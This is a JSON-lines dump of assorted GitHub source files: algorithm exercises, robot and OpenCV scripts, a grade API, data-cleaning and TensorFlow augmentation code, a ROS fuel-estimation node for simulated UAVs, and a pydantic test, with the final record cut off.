+{"seq_id":"7495553836","text":"from typing import List\n\n\nclass Solution:\n def maxPoints(self, points: List[List[int]]) -> int:\n max_count = 0\n\n def find_slope(p1, p2):\n x1, y1 = p1\n x2, y2 = p2\n\n if y1 - y2 == 0:\n slope = 0\n else:\n slope = \"undefined\" if x1 - x2 == 0 else (x1 - x2) / (y1 - y2)\n\n return slope\n\n for i in range(len(points)):\n slope_count = {}\n\n for j in range(i + 1, len(points)):\n point1 = points[i]\n point2 = points[j]\n slope = find_slope(point1, point2)\n\n slope_count[slope] = slope_count.get(slope, 0) + 1\n max_count = max(max_count, slope_count[slope])\n\n return max_count + 1\n\n\"\"\"\nExplanation:\n\nIterate through each point and compare it with all other points to calculate the slopes of the lines formed by pairs of points. Use a dictionary slope_count to keep track of the count of each slope encountered. The max count is updated whenever a new slope count exceeds the current maximum. The helper function find_slope calculates the slope between two points (x1, y1) and (x2, y2). It handles special cases where the y-coordinates are equal (horizontal line) or the x-coordinates are equal (vertical line), and returns the slope value accordingly.\n\nFinally, return the max count once we're done iterating through all points.\n\nNotes:\n\nTime complexity: O(n^2), as the nested loop iterates through each pair of points for each point\n\nSpace complexity: O(n) to store the slope counts\n\"\"\"\n\n# Test Case 1: Normal case w/ 3 points\npoints = [[1, 1], [2, 2], [3, 3]]\nresult = Solution().maxPoints(points)\nexpected = 3\nassert result == expected, f\"Expected {expected} but got {result}\"\n\n# Test Case 2: All points are on the same line\npoints = [[1, 1], [2, 2], [3, 3], [4, 4], [5, 5]]\nresult = Solution().maxPoints(points)\nexpected = 5\nassert result == expected, f\"Expected {expected} but got {result}\"\n\n# Test Case 3: Points form a triangle\npoints = [[1, 1], [2, 2], [3, 3], [1, 3], [2, 1]]\nresult = Solution().maxPoints(points)\nexpected = 3\nassert result == expected, f\"Expected {expected} but got {result}\"\n\n# Test Case 4: Points form a vertical line\npoints = [[1, 1], [1, 2], [1, 3], [1, 4], [1, 5]]\nresult = Solution().maxPoints(points)\nexpected = 5\nassert result == expected, f\"Expected {expected} but got {result}\"\n\n# Test Case 5: Points form a horizontal line\npoints = [[1, 1], [2, 1], [3, 1], [4, 1], [5, 1]]\nresult = Solution().maxPoints(points)\nexpected = 5\nassert result == expected, f\"Expected {expected} but got {result}\"\n\n# Test Case 6: Single point\npoints = [[1, 1]]\nresult = Solution().maxPoints(points)\nexpected = 1\nassert result == expected, f\"Expected {expected} but got {result}\"\n\n# Test Case 7: Single slope between points\npoints = [[1, 0], [2, 3], [3, 5]]\nresult = Solution().maxPoints(points)\nexpected = 2\nassert result == expected, f\"Expected {expected} but got {result}\"","repo_name":"garofalof/algopractice_python","sub_path":"hard/149_Max_Points_on_a_Line.py","file_name":"149_Max_Points_on_a_Line.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35268918745","text":"#! /usr/bin/env python\r\n#-*- coding: utf-8 -*-\r\n'''\r\n\tmade by Ian in 2017-8-4 17:16:46\r\n\tLocomotion control Tutorial: The Robot Position\r\n\thttp://doc.aldebaran.com/2-1/naoqi/motion/control-walk-tuto2.html\r\n'''\r\n\r\nimport time\r\nfrom naoqi import ALProxy\r\nrobot_ip = \"192.168.1.102\" #NAO的IP地址。注:确保主机和NAO处于同一局域网\r\nrobot_port = 9559 # default port : 9559\r\nmotionProxy = ALProxy(\"ALMotion\", robot_ip, robot_port)\r\npostureProxy = ALProxy(\"ALRobotPosture\", robot_ip, robot_port)\r\n\r\n#aup.playFileFromPosition(\"F:\\\\CloudMusic\\\\Alvaro Soler - Volar.mp3\")\r\n#at.ALMotionProxy(0.1)\r\nmotionProxy.wakeUp() # 唤醒机器人\r\nmotionProxy.moveInit() # 初始化行走动作\r\nmotionProxy.moveTo(0,0,5) # 行走距离 (前后、左右、转向角度)\r\n\r\n# Send robot to Stand Init\r\npostureProxy.goToPosture(\"StandInit\", 0.5)\r\n# Initialize the move\r\nmotionProxy.moveInit()\r\n'''\r\n# end init, begin experiment\r\n\r\n# First call of move API\r\n# with post prefix to not be bloquing here.\r\nmotionProxy.post.moveTo(0.3, 0.0, 0.5)\r\n\r\n# wait that the move process start running\r\ntime.sleep(0.1)\r\n\r\n# get robotPosition and nextRobotPosition\r\nuseSensors = False\r\nrobotPosition = almath.Pose2D(motionProxy.getRobotPosition(useSensors))\r\nnextRobotPosition = almath.Pose2D(motionProxy.getNextRobotPosition())\r\n'''\r\nmotionProxy.rest() # 机器人复位\r\n\r\n","repo_name":"Yeah-Kun/python","sub_path":"NAO/Tutorial/LearnMotion.py","file_name":"LearnMotion.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"3"} +{"seq_id":"36732660805","text":"import KeyClipWriter\r\nfrom imutils.video import VideoStream\r\nimport argparse\r\nimport datetime\r\nimport imutils\r\nimport time\r\nimport cv2\r\n\r\n#构造参数解析并解析参数\r\nap=argparse.ArgumentParser()\r\nap.add_argument(\"-o\",\"--output\",required=True,\r\n help=\"path to output directory\") #输出目录的路径\r\nap.add_argument(\"-p\",\"-picamera\",type=int,default=-1,#是否应该使用Raspberry Pi相机\r\n help=\"whether or not the Raspberry Pi camera should be used\")\r\nap.add_argument(\"-f\",\"-fps\",type=int,default=20,\r\n help=\"FPS of output video\")#输出视频的FPS\r\nap.add_argument(\"-c\",\"--codec\",type=str,default=\"MJPG\",\r\n help=\"codec of output video\")#输出视频的编解码器\r\nap.add_argument(\"-b\",\"--buffer-size\",type=int,default=32,\r\n help=\"buffer size of video clip writer\")#视频剪辑编写器的缓冲区大小\r\nargs=vars(ap.parse_args())\r\n\r\n#初始化视频流,并允许摄像头传感器 “warmup”\r\nprint(\"[INFO] warming up camera...\")\r\nvs=VideoStream(usePiCamera=args[\"picamera\"]>0).start()\r\ntime.sleep(2.0)\r\n\r\n#定义“绿色\"球的上下边界在HSV颜色空间\r\ngreenLower=(29,86,6)\r\ngreenUpper=(64,255,255)\r\n#初始化密钥剪辑的编写者和连续的编号\r\nkcw=KeyClipWriter(bufSize=args[\"buffer_size\"])\r\nconsecFrames=0\r\n\r\n#保持循环\r\nwhile True:\r\n '''\r\n 抓取当前帧,调整其大小,然后初始化布尔值,用于指示是否连续帧,计数器应更新\r\n '''\r\n frame=vs.read()\r\n frame=imutils.resize(frame,width=600)\r\n updateConsecFrames=True\r\n #模糊帧并将其转换为HSV颜色空间\r\n blurred=cv2.GaussianBlur(frame,(11,11),0)\r\n hsv=cv2.cvtColor(blurred,cv2.COLOR_BGR2GRAY)\r\n #为颜色”绿色“构建遮罩,然后进行一系列的扩张和腐蚀以出去小的遮罩中剩下的斑点\r\n mask=cv2.inRange(hsv,greenLower,greenUpper)\r\n mask=cv2.erode(mask,None,iterations=2)\r\n mask=cv2.dilate(mask,None,iterations=2)\r\n #在遮罩中找到轮廓\r\n cnts=cv2.findContours(mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n cnts=imutils.grab_contours(cnts)\r\n\r\n # 仅在发现至少一个轮廓时继续\r\n if len(cnts) > 0:\r\n # 找到遮罩中最大的轮廓,然后使用它计算最小的包围圈\r\n c = max(cnts, key=cv2.contourArea)\r\n ((x, y), radius) = cv2.minEnclosingCircle(c)\r\n updateConsecFrames = radius <= 10\r\n # 仅在半径达到最小尺寸的时候继续\r\n if radius > 10:\r\n consecFrames = 0\r\n cv2.circle(frame, (int(x), int(y)), int(radius),\r\n (0, 0, 255), 2)\r\n # 如果我们尚未录制,请开始录制\r\n if not kcw.recording:\r\n timestamp = datetime.datetime.now()\r\n p = \"{}/{}.avi\".format(args[\"output\"],\r\n timestamp.strftime(\"%Y%m%d-%H%M%S\"))\r\n kcw.start(p, cv2.VideoWriter_fourcc(*args[\"codec\"]),\r\n args[\"fps\"])\r\n #否则,此框架中未执行任何操作,因此增加包含的连续帧数无动作\r\n if updateConsecFrames:\r\n consecFrames += 1\r\n # 更新关键帧剪辑缓冲区\r\n kcw.update(frame)\r\n # 如果我们正在录制并且无动作的帧数连续达到阈值,停止录制剪辑\r\n if kcw.recording and consecFrames == args[\"buffer_size\"]:\r\n kcw.finish()\r\n # 显示框架\r\n cv2.imshow(\"Frame\", frame)\r\n key = cv2.waitKey(1) & 0xFF\r\n # 如果按了q键,则从循环中中断\r\n if key == ord(\"q\"):\r\n break\r\n\r\n # 如果我们正在录制剪辑,请把它包起来\r\n if kcw.recording:\r\n kcw.finish()\r\n # 清理\r\n cv2.destroyAllWindows()\r\n vs.stop()","repo_name":"pan8090/OpenCV","sub_path":"save_key_events.py","file_name":"save_key_events.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26404163705","text":"from model import Subject, SubjectType, Grade, User\nfrom student import _has_student_full_permission_r, _has_student_full_permission_rw\nfrom user import _verify_token\n\ndef student_grade_add_update(token, student_uid, grade_list):\n uid = _verify_token(token)\n user = User.get_by_id(uid)\n if not _has_student_full_permission_rw(user, student_uid):\n raise ValueError(\"permission denied\")\n\n for item in grade_list:\n subject_id = Subject.get_or_none(Subject.name == item.subject_name)\n if not subject_id:\n subject_id = Subject.create(type=item.subject_type, name=item.subject_name, credit=item.subject_credit).subject_id\n\n grade = Grade.get_or_none(Grade.uid == student_uid, Grade.subject_id == subject_id)\n if grade:\n grade.score = item.score\n grade.save()\n else:\n Grade.create(uid=student_uid, subject_id=subject_id, score=item.score)\n\n return {\"status\": \"ok\"}\n\n\ndef student_grade_list(token, student_uid):\n uid = _verify_token(token)\n user = User.get_by_id(uid)\n if not _has_student_full_permission_r(user, student_uid):\n raise ValueError(\"permission denied\")\n\n query = Grade.select().where(Grade.uid == student_uid)\n data = [{\n \"subject_name\": x.subject_id.name,\n \"type\": x.subject_id.type,\n \"credit\": x.subject_id.credit,\n \"score\": x.score\n } for x in query]\n return {\"status\": \"ok\", \"grade_list\": data}\n","repo_name":"BJUT-FGH/CAHCPS-Backend","sub_path":"grade.py","file_name":"grade.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"9294082545","text":"import pandas as pd\nfrom utility import extract_data\n\n'''\n1. For IMDB, Wiki images - extract DOB, Date of photo take, face scores 1 & 2, \n gender, filepath\n2. Compile IMDB-Wiki dataset\n3. Clean noisy face_score1 and date values\n'''\n\nproject_dir='/Users/bhoomithakkar/PycharmProjects/chicago_trial/'\nsource_dir=project_dir\ndestination_dir=project_dir+'data/'\n\n# Extraction from Wiki meta-data\ndf1=extract_data.extract_data_fields('wiki', source_dir, destination_dir)\n# Extraction from IMDB meta-data\ndf2=extract_data.extract_data_fields('imdb', source_dir, destination_dir)\n\n# Concatenate wiki-imdb data\ndf=pd.concat([df1, df2]) # 523051\n\n# Visualising the basic summary of the data\nnull=df.isna().sum() # 305158 nans for score 2\ndescription=df.describe().transpose()\n\ndf['male']=df['gender'].apply(lambda x: 1 if x=='male' else 0)\ndf['female']=1-df['male']\n\ndf['face_score1']=df['face_score1'].astype('str')\ndf['face_score2']=df['face_score2'].astype('str')\n\n# Eliminate noisy score values\ndf_score1=df[df['face_score1'] != '-inf'] # 442,733\n\n# Eliminate noisy age values\ndf_age=df_score1[(df_score1['age'] >= 0) & (df_score1['age'] <= 100)] # 442322\ndf_age=df_age.reset_index()\ndf_age.drop(['index'], axis=1, inplace=True)\n\n# Checking basic description for data\ndescription_age=df_age.describe().transpose()\n\ndf_age.to_csv(destination_dir+'compiled_data_score1.csv',index=False)","repo_name":"BhoomiThakkar/imdb-wiki-assignment","sub_path":"code/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8146089912","text":"\nlist1 =[]\nprint('enter how many elements do you want to add to list:')\nfor i in range(0,int(input())):\n list1.append(input())\n\nprint('how many mid elements you want:')\nk = int(input())\n\nstartindex= (len(list1)//2)-(k//2)\nendindex = (len(list1)//2)+(k//2)\n\nresult =[]\n\nfor j in range(len(list1)):\n if j>=startindex and j1.0-1e-4,tf.ones_like(train_x),tf.zeros_like(train_x))\n\n #for camera\n train_c=tf.identity(train_x)\n train_c=tf.image.random_brightness(image=train_c, max_delta=self.max_off_brightness, seed=None)\n train_c=tf.clip_by_value(train_c,0,1)\n train_c=tf.where(zoom_x_mask>1.0-1e-4, tf.ones_like(train_c),train_c)\n \n #for others \n train_x = random_brightness(train_x, self.max_off_brightness)\n train_x = invert_color(train_x)\n train_x=tf.where(zoom_x_mask>1.0-1e-4, tf.ones_like(train_x),train_x)\n \n train_x=self._set_for_camera(train_x, train_c, obj_id)\n return (train_x, train_y, depth_y, obj_id, hsh_code)\n \n \n\n def _float_cast(self, train_x,train_y,depth_y,obj_id,hsh_code):\n train_x = tf.image.convert_image_dtype(train_x,tf.float32)\n train_y = tf.image.convert_image_dtype(train_y,tf.float32)\n return train_x,train_y,depth_y, obj_id,hsh_code\n\n def _set_for_camera(self, train_o, train_c, obj_id):\n with tf.variable_scope('set_encoder_inputs'):\n train_o = tf.cond(tf.logical_and(tf.greater_equal(obj_id,tf.constant(399,dtype=tf.int64)),tf.less(obj_id,tf.constant(473,dtype=tf.int64))), \n lambda:tf.identity(train_c), lambda:tf.identity(train_o))\n\n train_o = tf.cond(tf.logical_and(tf.greater_equal(obj_id,tf.constant(399+1085,dtype=tf.int64)),tf.less(obj_id,tf.constant(473+1085,dtype=tf.int64))), \n lambda:tf.identity(train_c), lambda:tf.identity(train_o))\n return train_o\n \n\n def _normalize_trainx_trainy(self, train_x, train_y, depth_y, obj_id, hsh_code):\n with tf.variable_scope('normalize_imgs'):\n _normalized_bgr_x= tf.image.per_image_standardization(train_x)\n _normalized_bgr_y= tf.image.per_image_standardization(train_y)\n\n min_normalized_bgrx=tf.reduce_min(_normalized_bgr_x)\n max_normalized_bgrx=tf.reduce_max(_normalized_bgr_x)\n\n min_normalized_bgry=tf.reduce_min(_normalized_bgr_y)\n max_normalized_bgry=tf.reduce_max(_normalized_bgr_y)\n\n train_x=(_normalized_bgr_x-min_normalized_bgrx)/(max_normalized_bgrx-min_normalized_bgrx)\n train_y=(_normalized_bgr_y-min_normalized_bgry)/(max_normalized_bgry-min_normalized_bgry)\n\n train_x = tf.where(tf.is_nan(train_x), tf.zeros_like(train_x), train_x)\n train_y = tf.where(tf.is_nan(train_y), tf.zeros_like(train_y), train_y)\n \n return train_x, train_y, depth_y, obj_id, hsh_code\n\n def preprocess_pipeline(self, dataset):\n dataset = dataset.map(self.deserialize_tfrecord) \n dataset = dataset.shuffle(buffer_size=1000)\n \n dataset = dataset.map(lambda train_x,train_y,depth_y,obj_id,hsh_code :\n self._float_cast(train_x,train_y,depth_y,obj_id,hsh_code))\n dataset = dataset.repeat()\n dataset = dataset.map(lambda train_x,train_y,depth_y,obj_id,hsh_code :\n self._tf_augmentations(train_x,train_y,depth_y,obj_id,hsh_code))\n\n dataset = dataset.map(lambda train_x,train_y,depth_y,obj_id,hsh_code:\n self._normalize_trainx_trainy(train_x,train_y,depth_y,obj_id,hsh_code))\n dataset = dataset.batch(self.batch_size)\n dataset = dataset.prefetch(1)\n return dataset\n\n def create_iterator(self, path_tf_records):\n tf_dataset = tf.data.TFRecordDataset(path_tf_records, compression_type = 'ZLIB')\n tf_dataset = self.preprocess_pipeline(tf_dataset)\n\n iterator = tf_dataset.make_initializable_iterator()\n self.next_element = iterator.get_next()\n return iterator\n\n\n","repo_name":"fylwen/DISP-6D","sub_path":"datasets/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"3"} +{"seq_id":"40652480309","text":"import numpy as np\nimport time\nimport rospy\nfrom geometry_msgs.msg import PoseStamped, Point\nfrom std_msgs.msg import Bool, Float64, Int64MultiArray, Float64MultiArray\nfrom mavros_msgs.msg import State\nfrom threading import Thread\n\n\nclass UAV(Thread):\n\t\"\"\"\n\tUAV - class for calculating mission time and fuel resource.\n\n\tInitialization attributes:\n\t\t- uav_type:\t\t\t\t(string: \"ralx6\" or \"orlan\")\n\t\t- uav_name: \t\t\t(string: \"scoutX\" or \"bomberX\", X - uav_num)\n\t\t- uav_num:\t\t\t\t(int: number of UAV)\n\t\t- uav_position:\t\t\tactive UAV popsition\n\t\t- takeoff_point:\t\tUAV's take-off point\n\t\t- grouping_point:\t\tUAV's grouping point\n\t\t- drop_point:\t\t\tpoint for cargo drop\n\t\t- landing_point:\t\tpoint for UAV landing\n\t\t- armed:\t\t\t\tUAV's state (True - alive, False - lost)\n\t\t- fuel_resource:\t\tavailable fuel resource (in hours)\n\t\t- fuel_consume:\t\t\tfuel consuption (per hour)\n\t\t- cargo:\t\t\t\tpresence of cargo on the UAV (True/False)\n\t\t\n\t\"\"\"\n\tdef __init__(self, uav_type, uav_name, uav_num):\n\t\tThread.__init__(self)\n\t\tself.uav_type = uav_type\n\t\tself.uav_name = uav_name\n\t\tself.uav_num = uav_num\n\n\t\tself.uav_position = Point()\n\t\tself.takeoff_point = Point()\n\t\tself.grouping_point = Point()\n\t\tself.drop_point = Point()\n\t\tself.landing_point = Point()\n\n\t\tself.armed = bool\n\t\tself.fuel_resource = None\n\t\tself.fuel_consume = None\n\t\tself.cargo = None\n\n\t\tself.max_fuel_resource = 0.8333 if uav_type==\"ralx6\" else 16 # hours\n\t\tself.max_velocity = 60.0 if uav_type==\"ralx6\" else 150 # km/h\n\n\t\tself.time_bound = 10.0\n\n\t\tself.fuel_resource_subscribe = Float64()\n\t\tself.fuel_consume_subscribe = Float64()\n\n\t\tself.topic_uav_position = self.uav_name + str(self.uav_num) + \"/mavros/local_position/pose\"\n\t\tself.topic_armed = self.uav_name + str(self.uav_num) + \"/mavros/state\"\n\t\t#self.topic_takeoff_point = uav_name + str(uav_num) + \"/takeoff_point\"\n\t\tself.topic_takeoff_point = \"scout0/takeoff_point\"\n\t\t#self.topic_grouping_point = uav_name + str(uav_num) + \"/grouping_point\"\n\t\tself.topic_grouping_point = \"scout0/grouping_point\"\n\t\t#self.topic_drop_point = uav_name + str(uav_num) + \"/drop_point\"\n\t\tself.topic_drop_point = \"scout0/drop_point\"\n\t\t#self.topic_landing_point = uav_name + str(uav_num) + \"/landing_point\"\n\t\tself.topic_landing_point = \"scout0/landing_point\"\n\t\tself.topic_cargo = self.uav_name + str(self.uav_num) + \"/cargo\"\n\t\tself.topic_fuel_resource = self.uav_name + str(self.uav_num) + \"/fuel_resource\"\n\t\tself.topic_fuel_consume = self.uav_name + str(self.uav_num) + \"/fuel_consume\"\n\t\trospy.Subscriber(self.topic_uav_position, PoseStamped, self.uav_position_callback)\n\t\trospy.Subscriber(self.topic_armed, State, self.armed_callback)\n\t\trospy.Subscriber(self.topic_takeoff_point, Point, self.takeoff_point_callback)\n\t\trospy.Subscriber(self.topic_grouping_point, Point, self.grouping_point_callback)\n\t\trospy.Subscriber(self.topic_drop_point, Point, self.drop_point_callback)\n\t\trospy.Subscriber(self.topic_landing_point, Point, self.landing_point_callback)\n\t\trospy.Subscriber(self.topic_cargo, Bool, self.cargo_callback)\n\t\trospy.loginfo(\"Wait for fuel_resource of \" + self.uav_name)\n\t\tself.fuel_resource_subscribe = rospy.wait_for_message(self.topic_fuel_resource, Float64)\n\t\trospy.loginfo(\"Done waiting for fuel_resource of \" + self.uav_name)\n\t\t#rospy.Subscriber(self.topic_fuel_resource, Float64, self.fuel_resource_callback)\n\t\trospy.loginfo(\"Wait for fuel_consume of \" + self.uav_name)\n\t\tself.fuel_consume_subscribe = rospy.wait_for_message(self.topic_fuel_consume, Float64)\n\t\trospy.loginfo(\"Done waiting for fuel_consume of \" + self.uav_name)\n\t\t#rospy.Subscriber(self.topic_fuel_consume, Float64, self.fuel_consume_callback)\n\t\t\n\n\tdef uav_position_callback(self, data):\n\t\tself.uav_position.x = data.pose.position.x\n\t\tself.uav_position.y = data.pose.position.y\n\t\tself.uav_position.z = data.pose.position.z\n\n\tdef armed_callback(self, data):\n\t\tself.armed = data.armed\n\n\tdef takeoff_point_callback(self, data):\n\t\tself.takeoff_point = data\n\n\tdef grouping_point_callback(self, data):\n\t\tself.grouping_point = data\n\n\tdef drop_point_callback(self, data):\n\t\tself.drop_point = data\n\n\tdef landing_point_callback(self, data):\n\t\tself.landing_point = data\n\n\tdef cargo_callback(self, data):\n\t\tself.cargo = data.data\n\n\tdef fuel_resource_callback(self, data):\n\t\tself.fuel_resource_subscribe.data = data.data # in hours\n\n\tdef fuel_consume_callback(self, data):\n\t\tself.fuel_consume_subscribe.data = data.data # in hours\n\n\tdef calc_takeoff_landing_time(self):\n\t\tgain_alt_speed = 40.0 if self.uav_type == \"ralx6\" else 28.8 # km/h\n\t\tscout_height = 1.2 # km\n\t\tbomber_height = 0.4 # km\n\t\tif self.uav_name == \"scout\":\n\t\t\ttakeoff_time = scout_height/gain_alt_speed # hours\n\t\telif self.uav_name == \"bomber\":\n\t\t\ttakeoff_time = bomber_height/gain_alt_speed # hours\n\t\treturn takeoff_time\n\n\tdef calc_path_distance(self):\n\t\t'''\n\t\tCalculating path distance from uav_position to landing_point in meters. \n\t\tTakes into account the presence of cargo on the UAV and location of the drop point.\n\n\t\tOutput:\n\t\t\t- distance (in meters)\n\t\t'''\n\t\tif self.cargo:\n\t\t\tdist_1 = calc_distance(self.uav_position, self.drop_point)\n\t\t\tdist_2 = calc_distance(self.drop_point, self.landing_point)\n\t\t\tdistance = dist_1 + dist_2\n\t\telse:\n\t\t\tdistance = calc_distance(self.uav_position, self.landing_point)\n\t\treturn distance\n\n\tdef landing_fuel_resource(self):\n\t\t'''\n\t\tCalculating amount of fuel resource that will be\n\t\tavailable to the drone at the moment it returns to base now.\n\n\t\tOutput:\n\t\t\t- fuel_data (dictionary):\n\t\t\t\t\"hours\": fuel_left_hours\n\t\t\t\t\"percent\": fuel_left_percent\n\t\t'''\n\t\tdistance = self.calc_path_distance()/1000 # kilometers\n\t\tmovement_in_hours = (distance/self.max_velocity) + self.calc_takeoff_landing_time() if self.uav_type==\"ralx6\" else (distance/self.max_velocity)\n\n\t\tfuel_left_hours = self.fuel_resource - movement_in_hours*self.max_fuel_resource\n\t\tfuel_left_percent = (fuel_left_hours/self.max_fuel_resource)*100\n\t\t#print(self.fuel_resource)\n\n\t\tfuel_data = {\"hours\": fuel_left_hours, \"percent\": fuel_left_percent}\n\t\treturn fuel_data\n\n\ndef calc_distance(point_1, point_2):\n\tx_1, y_1, _ = point_1.x, point_1.y, point_1.z\n\tx_2, y_2, _ = point_2.x, point_2.y, point_2.z\n\tdistance = np.sqrt((x_1 - x_2)**2 + (y_1 - y_2)**2)\n\treturn distance\n\ndef check_armed_uavs(uavs):\n\tarmed_uavs = []\n\tfor uav in uavs:\n\t\tif uav.armed == True:\n\t\t\tarmed_uavs.append(uav)\n\treturn armed_uavs\n\t\n\ndef fuel_check(n, scout_fuel, bombers_fuel, p):\n\t\"\"\"\n\t:param scout_fuel: scout fuel level\n\t:param bombers_fuel: fuel levels of bombers\n\t:param n: maximum amount of UAVs with critical fuel level\n\t:param p: critical fuel level\n\t:return: who is returns\n\t\"\"\"\n\tif scout_fuel <= p:\n\t\tprint('return all UAVs')\n\t\treturn [0] # Return all UAVs\n\telse:\n\t\ttmp = list()\n\t\tcheck = 0\n\t\tfor i, b in bombers_fuel.items():\n\t\t\tif b <= p:\n\t\t\t\tcheck += 1\n\t\t\t\ttmp.append(i)\n\t\t\t\tif check >= n:\n\t\t\t\t\tprint('return all UAVs')\n\t\t\t\t\treturn [0] # Return all UAVs\n\t\tif check != 0:\n\t\t\t#Make message in list\n\t\t\toutput = [i for i in tmp]\n\t\t\toutput.insert(0, 1)\n\t\t\treturn output # Return not all (output = [0, ...])\n\t\telse:\n\t\t\tprint('no one returns')\n\t\t\treturn [-1] # No one returns\n\n\n\ndef start(uavs):\n\tstart_time = time.time()\n\twhile True:\n\n\t\tarmed_uavs = check_armed_uavs(uavs)\n\n\t\tif time.time() - start_time > TIME_BOUND:\n\t\t\tprint(\"2 sec.\")\n\t\t\tstart_time = time.time()\n\t\t\tif len(armed_uavs) > 0:\n\t\t\t\tscout_fuel = 0.0 # Why 0.0? # TODO maybe here is error\n\t\t\t\tbombers_fuel = {}\n\t\t\t\tfor uav in armed_uavs:\n\t\t\t\t\tuav.fuel_resource -= (TIME_BOUND/3600.0)*uav.fuel_consume\n\t\t\t\t\tresource_data = uav.landing_fuel_resource()\n\t\t\t\t\tif uav.uav_name == \"bomber\":\n\t\t\t\t\t\tbombers_fuel[uav.uav_num] = resource_data[\"percent\"]\n\t\t\t\t\telif uav.uav_name == \"scout\":\n\t\t\t\t\t\tscout_fuel = resource_data[\"percent\"]\n\t\t\t\t\tprint(resource_data[\"percent\"], uav.uav_name)\n\t\t\t\t\t\n\t\t\t\t# Crit signal\n\t\t\t\tcrit_signal = fuel_check(N, scout_fuel, bombers_fuel, P)\n\t\t\t\tbattery_scout_info = [scout_fuel]\n\t\t\t\tbattery_bomber = [bombers_fuel]\n\t\t\t\t# Make message\n\t\t\t\tmessage_crit_signal = Int64MultiArray(data=crit_signal) # TODO maybe here is error\n\t\t\t\tmessage_battery_scout = Float64MultiArray(data=battery_scout_info)\n\t\t\t\tmessage_battery_bomber = Float64MultiArray(data=battery_bomber)\n\t\t\t\tprint(message_crit_signal.data)\n\t\t\t\t# Publish messageW\n\t\t\t\tcrit_sit_info.publish(message_crit_signal)\n\t\t\t\tbattery_stat_info.publish(message_battery_scout)\n\t\t\t\tbattery_bomber_info.publish(message_battery_bomber)\n\t\tif rospy.is_shutdown():\n\t\t\trospy.loginfo('Shutdown.')\n\t\t\tbreak\n\n\nif __name__ == \"__main__\":\n\tTIME_BOUND = 2.0 # sec\n\tN = 2 # Bound num of uav's\n\tP = 5 # Percents\n\n\trospy.init_node(\"energy_evaluation\")\n\tcrit_sit_info = rospy.Publisher(\"/critical_status_info\", Int64MultiArray, queue_size=10)\n\tbattery_stat_info = rospy.Publisher(\"/battery_status_info\", Float64MultiArray, queue_size=10)\n\tbattery_bomber_info = rospy.Publisher(\"bomber/battery_status_info\", Float64MultiArray, queue_size=10)\n\t# Init UAV's\n\tscout0 = UAV(\"ralx6\", \"scout\", 0)\n\tbomber1 = UAV(\"ralx6\", \"bomber\", 1)\n\tbomber2 = UAV(\"ralx6\", \"bomber\", 2)\n\tbomber3 = UAV(\"ralx6\", \"bomber\", 3)\n\n\tuavs = [scout0, bomber1, bomber2, bomber3]\n\t#uavs = [scout0]\n\n\tscout0.fuel_resource = scout0.fuel_resource_subscribe.data\n\tscout0.fuel_consume = scout0.fuel_consume_subscribe.data\n\t\n\tbomber1.fuel_resource = bomber1.fuel_resource_subscribe.data\n\tbomber1.fuel_consume = bomber1.fuel_consume_subscribe.data\n\t\n\tbomber2.fuel_resource = bomber2.fuel_resource_subscribe.data\n\tbomber2.fuel_consume = bomber2.fuel_consume_subscribe.data\n\t\n\tbomber3.fuel_resource = bomber3.fuel_resource_subscribe.data\n\tbomber3.fuel_consume = bomber3.fuel_consume_subscribe.data\n\n\tstart(uavs)\t\n","repo_name":"IgorLebed/UAV_Swarm_gazebo","sub_path":"catkin_ws/src/path_ta/better_task/energy_compute.py","file_name":"energy_compute.py","file_ext":"py","file_size_in_byte":9560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"22513584512","text":"#!/bin/python\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'diagonalDifference' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts 2D_INTEGER_ARRAY arr as parameter.\n#\n\ndef diagonalDifference(arr):\n # Write your code here\n d1,d2=0,0\n for i in range(0,n):\n d1+=arr[i][i]\n d2+=arr[i][-(i+1)]\n return abs(d1-d2)\n \nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(raw_input().strip())\n\n arr = []\n\n for _ in xrange(n):\n arr.append(map(int, raw_input().rstrip().split()))\n\n result = diagonalDifference(arr)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"DSC-COEA-Ambajogai/Hacktoberfest2020","sub_path":"Write_Program_in_any_lang/python/DiagDifference.py","file_name":"DiagDifference.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"3"} +{"seq_id":"27958222431","text":"from enum import Enum\nfrom typing import Literal\n\nfrom docstring_parser import parse\nfrom pydantic import create_model\n\nfrom openai_func_call.assembly import CallableFunction, func_to_callable_function\n\n\ndef test_func_to_callable_function():\n class EnumType(str, Enum):\n enum1: str = \"enum1\"\n enum2: str = \"enum2\"\n\n def test_function(\n str_param: str,\n float_param: float,\n int_param: int,\n literal_param: Literal[\"option1\", \"option2\"],\n enum_param: EnumType,\n default_str_param: str = \"default_str_param\",\n ):\n \"\"\"Description of test function here.\n :param str_param: This is the string parameter.\n :param float_param: This is the float parameter.\n :param int_param: This is the int parameter.\n :param literal_param: This is the literal parameter.\n :param enum_param: This is the enum parameter.\n :param default_str_param: This is the default string parameter.\n \"\"\"\n ...\n\n callable_function = func_to_callable_function(test_function)\n # -- Expected --\n params_model = create_model(\n \"FunctionArgsModel\",\n str_param=(str, ...),\n float_param=(float, ...),\n int_param=(int, ...),\n literal_param=(Literal[\"option1\", \"option2\"], ...),\n enum_param=(EnumType, ...),\n default_str_param=(str, \"default_str_param\"),\n )\n doc_str = parse(test_function.__doc__)\n api_dict = {\n 